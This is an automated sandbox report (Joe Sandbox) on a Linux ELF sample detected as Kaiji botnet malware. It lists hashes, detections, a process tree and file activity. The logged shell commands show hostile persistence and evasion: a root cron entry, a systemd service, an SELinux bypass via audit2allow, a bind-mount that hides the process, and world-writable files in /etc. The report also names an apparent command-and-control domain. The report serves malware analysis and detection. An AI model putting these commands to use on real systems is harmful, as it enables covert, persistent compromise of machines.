Edit tour

Linux Analysis Report
fL4E1jNVCt.elf

Overview

General Information

Sample name:	fL4E1jNVCt.elf renamed because original name is a hash value
Original sample name:	e55a695d2530b3fb5c80256f6036de29.elf
Analysis ID:	1547221
MD5:	e55a695d2530b3fb5c80256f6036de29
SHA1:	cbf9fb21338b161a6b5ab67425e8afbcf9bbcd93
SHA256:	ce2944509d3936280343639c38ed5240f0a35c8d1dd63a00ce0eef1052325124
Tags:	64elf
Infos:

Detection

Kaiji

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Yara detected Kaiji

Drops files in suspicious directories

Machine Learning detection for sample

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using cron

Sample tries to set files in /etc globally writable

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "sleep" command used to delay execution and potentially evade sandboxes

Executes the "systemctl" command used for controlling the systemd system and service manager

Reads the 'hosts' file potentially containing internal network hosts

Sample has stripped symbol table

Sample tries to set the executable flag

Sleeps for long times indicative of sandbox evasion

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1547221
Start date and time:	2024-11-02 03:59:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	fL4E1jNVCt.elf renamed because original name is a hash value
Original Sample Name:	e55a695d2530b3fb5c80256f6036de29.elf
Detection:	MAL
Classification:	mal76.spre.troj.evad.linELF@0/57@200/0

Warnings

VT rate limit hit for: /.mod
VT rate limit hit for: ss.us-tv.top

Runtime Messages

Command:	/tmp/fL4E1jNVCt.elf
PID:	5752
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

fL4E1jNVCt.elf (PID: 5752, Parent: 5676, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /tmp/fL4E1jNVCt.elf

fL4E1jNVCt.elf New Fork (PID: 5756, Parent: 5752)

fL4E1jNVCt.elf (PID: 5756, Parent: 5752, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /tmp/fL4E1jNVCt.elf

fL4E1jNVCt.elf New Fork (PID: 5765, Parent: 5756)

bash (PID: 5765, Parent: 5756, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32676&

bash New Fork (PID: 5766, Parent: 5765)

32676 (PID: 5766, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /etc/32676

32676 New Fork (PID: 5768, Parent: 5766)

sleep (PID: 5768, Parent: 5766, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60

32676 New Fork (PID: 5960, Parent: 5766)

opt.services.cfg (PID: 5960, Parent: 5766, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /etc/opt.services.cfg

opt.services.cfg New Fork (PID: 5964, Parent: 5960)

opt.services.cfg (PID: 5964, Parent: 5960, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /etc/opt.services.cfg

32676 New Fork (PID: 5973, Parent: 5766)

sleep (PID: 5973, Parent: 5766, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60

32676 New Fork (PID: 6041, Parent: 5766)

opt.services.cfg (PID: 6041, Parent: 5766, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /etc/opt.services.cfg

opt.services.cfg New Fork (PID: 6045, Parent: 6041)

opt.services.cfg (PID: 6045, Parent: 6041, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /etc/opt.services.cfg

32676 New Fork (PID: 6054, Parent: 5766)

sleep (PID: 6054, Parent: 5766, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60

fL4E1jNVCt.elf New Fork (PID: 5767, Parent: 5756)

service (PID: 5767, Parent: 5756, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start

service New Fork (PID: 5769, Parent: 5767)

basename (PID: 5769, Parent: 5767, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5770, Parent: 5767)

basename (PID: 5770, Parent: 5767, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5771, Parent: 5767)

systemctl (PID: 5771, Parent: 5767, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 5772, Parent: 5767)

service New Fork (PID: 5773, Parent: 5772)

systemctl (PID: 5773, Parent: 5772, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 5774, Parent: 5772)

sed (PID: 5774, Parent: 5772, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 5767, Parent: 5756, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

fL4E1jNVCt.elf New Fork (PID: 5777, Parent: 5756)

bash (PID: 5777, Parent: 5756, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"

bash New Fork (PID: 5778, Parent: 5777)

systemctl (PID: 5778, Parent: 5777, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

bash New Fork (PID: 5782, Parent: 5777)

systemctl (PID: 5782, Parent: 5777, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaoff.service

bash New Fork (PID: 5786, Parent: 5777)

systemctl (PID: 5786, Parent: 5777, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaoff.service

bash New Fork (PID: 5806, Parent: 5777)

journalctl (PID: 5806, Parent: 5777, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager

fL4E1jNVCt.elf New Fork (PID: 5822, Parent: 5756)

bash (PID: 5822, Parent: 5756, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"

bash New Fork (PID: 5823, Parent: 5822)

bash New Fork (PID: 5824, Parent: 5822)

bash New Fork (PID: 5825, Parent: 5822)

fL4E1jNVCt.elf New Fork (PID: 5826, Parent: 5756)

bash (PID: 5826, Parent: 5756, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"

fL4E1jNVCt.elf New Fork (PID: 5827, Parent: 5756)

renice (PID: 5827, Parent: 5756, MD5: 3686c936ed1df483498266a36871cb5b) Arguments: renice -20 5756

fL4E1jNVCt.elf New Fork (PID: 5828, Parent: 5756)

mount (PID: 5828, Parent: 5756, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5756

fL4E1jNVCt.elf New Fork (PID: 5850, Parent: 5756)

service (PID: 5850, Parent: 5756, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start

service New Fork (PID: 5851, Parent: 5850)

basename (PID: 5851, Parent: 5850, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5852, Parent: 5850)

basename (PID: 5852, Parent: 5850, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5853, Parent: 5850)

systemctl (PID: 5853, Parent: 5850, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 5854, Parent: 5850)

service New Fork (PID: 5855, Parent: 5854)

systemctl (PID: 5855, Parent: 5854, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 5856, Parent: 5854)

sed (PID: 5856, Parent: 5854, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 5850, Parent: 5756, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service

fL4E1jNVCt.elf New Fork (PID: 5881, Parent: 5756)

systemctl (PID: 5881, Parent: 5756, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

systemd New Fork (PID: 5780, Parent: 5779)

snapd-env-generator (PID: 5780, Parent: 5779, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5784, Parent: 5783)

snapd-env-generator (PID: 5784, Parent: 5783, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5787, Parent: 1)

System.mod (PID: 5787, Parent: 1, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /boot/System.mod

System.mod New Fork (PID: 5802, Parent: 5787)

System.mod (PID: 5802, Parent: 5787, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /boot/System.mod

systemd New Fork (PID: 5807, Parent: 1)

System.mod (PID: 5807, Parent: 1, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /boot/System.mod

System.mod New Fork (PID: 5811, Parent: 5807)

System.mod (PID: 5811, Parent: 5807, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /boot/System.mod

udisksd New Fork (PID: 5839, Parent: 803)

dumpe2fs (PID: 5839, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5871, Parent: 1)

cron (PID: 5871, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5916, Parent: 5871)

cron New Fork (PID: 5925, Parent: 5916)

sh (PID: 5925, Parent: 5916, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5926, Parent: 5925)

.mod (PID: 5926, Parent: 5925, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5927, Parent: 5926)

libgdi.so.0.8.1 (PID: 5927, Parent: 5926, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /usr/lib/libgdi.so.0.8.1

libgdi.so.0.8.1 New Fork (PID: 5931, Parent: 5927)

libgdi.so.0.8.1 (PID: 5931, Parent: 5927, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /usr/lib/libgdi.so.0.8.1

systemd New Fork (PID: 5948, Parent: 1)

cron (PID: 5948, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5991, Parent: 5948)

cron New Fork (PID: 6000, Parent: 5991)

sh (PID: 6000, Parent: 5991, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 6001, Parent: 6000)

.mod (PID: 6001, Parent: 6000, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 6002, Parent: 6001)

libgdi.so.0.8.1 (PID: 6002, Parent: 6001, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /usr/lib/libgdi.so.0.8.1

libgdi.so.0.8.1 New Fork (PID: 6006, Parent: 6002)

libgdi.so.0.8.1 (PID: 6006, Parent: 6002, MD5: e55a695d2530b3fb5c80256f6036de29) Arguments: /usr/lib/libgdi.so.0.8.1

systemd New Fork (PID: 6029, Parent: 1)

cron (PID: 6029, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Kaiji	Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.	No Attribution	https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/ https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/ https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/ https://www.elastic.co/security-labs/betting-on-bots	https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
fL4E1jNVCt.elf	JoeSecurity_Kaiji_1	Yara detected Kaiji	Joe Security

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: fL4E1jNVCt.elf	ReversingLabs: Detection: 21%
Source: fL4E1jNVCt.elf	Virustotal: Detection: 29%			Perma Link

Machine Learning detection for sample

Source: fL4E1jNVCt.elf

Joe Sandbox ML: detected

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)

Reads hosts file: /etc/hosts

Jump to behavior

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ss.us-tv.top

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal76.spre.troj.evad.linELF@0/57@200/0

Source: ELF file section

Submission: fL4E1jNVCt.elf

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/profile.d/bash_cfg.sh			Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/profile.d/gateway.sh			Jump to behavior

Sample tries to persist itself using cron

Source: /bin/bash (PID: 5826)

File: /etc/crontab

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/32676 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/.walk	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /dev/.walk.lod	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/.walk	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /dev/.old	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /dev/.img	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /.mod	Jump to behavior
Source: /etc/opt.services.cfg (PID: 5964)	File: /etc/.walk	Jump to behavior
Source: /etc/opt.services.cfg (PID: 5964)	File: /dev/.walk.lod	Jump to behavior
Source: /etc/opt.services.cfg (PID: 6045)	File: /etc/.walk	Jump to behavior
Source: /etc/opt.services.cfg (PID: 6045)	File: /dev/.walk.lod	Jump to behavior
Source: /boot/System.mod (PID: 5802)	File: /etc/.walk	Jump to behavior
Source: /boot/System.mod (PID: 5802)	File: /dev/.walk.lod	Jump to behavior
Source: /boot/System.mod (PID: 5811)	File: /etc/.walk	Jump to behavior
Source: /boot/System.mod (PID: 5811)	File: /dev/.walk.lod	Jump to behavior
Source: /.mod (PID: 5926)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5931)	File: /etc/.walk	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5931)	File: /dev/.walk.lod	Jump to behavior
Source: /.mod (PID: 6001)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.1 (PID: 6006)	File: /etc/.walk	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.1 (PID: 6006)	File: /dev/.walk.lod	Jump to behavior

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Empty hidden file: /dev/.old	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.1 (PID: 6006)	Empty hidden file: /dev/.walk.lod	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Empty hidden file: /dev/.img	Jump to behavior

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3760/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3761/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/1583/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/2672/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/110/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3759/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/111/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/112/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/113/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/234/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/1577/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/114/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/235/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/115/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/116/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/117/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/118/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/119/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/10/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/917/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3758/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/11/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/12/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/13/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/14/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/15/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/16/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/17/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/18/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/19/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/1593/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/240/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/120/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3094/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/121/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/242/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3406/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/1/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/122/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/243/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/2/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/123/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/244/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/1589/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/124/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/245/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/1588/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/125/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/4/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/246/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3402/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/126/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/5/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/247/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/127/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/6/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/248/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/128/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/7/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/249/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/8/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/129/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/800/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/9/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/801/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/5700/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/803/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/20/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/806/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/21/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/807/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/928/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/22/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/23/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/24/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/25/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/26/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/27/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/28/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/29/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3662/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3420/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/490/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/250/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/130/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/251/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/131/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/252/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/132/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/253/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/254/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/255/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/135/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/256/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/1599/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/257/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/378/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/258/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/3412/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/259/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/30/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/35/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/1371/stat	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File opened: /proc/260/stat	Jump to behavior

Source: /tmp/fL4E1jNVCt.elf (PID: 5765)	Shell command executed: /bin/bash -c /etc/32676&	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5777)	Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5822)	Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5826)	Shell command executed: /bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"	Jump to behavior
Source: /usr/sbin/cron (PID: 5925)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior
Source: /usr/sbin/cron (PID: 6000)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior

Source: /usr/sbin/service (PID: 5767)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior
Source: /usr/sbin/service (PID: 5771)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 5773)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /bin/bash (PID: 5778)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/bash (PID: 5782)	Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaoff.service	Jump to behavior
Source: /bin/bash (PID: 5786)	Systemctl executable: /usr/bin/systemctl -> systemctl start quotaoff.service	Jump to behavior
Source: /usr/sbin/service (PID: 5850)	Systemctl executable: /usr/bin/systemctl -> systemctl start cron.service	Jump to behavior
Source: /usr/sbin/service (PID: 5853)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
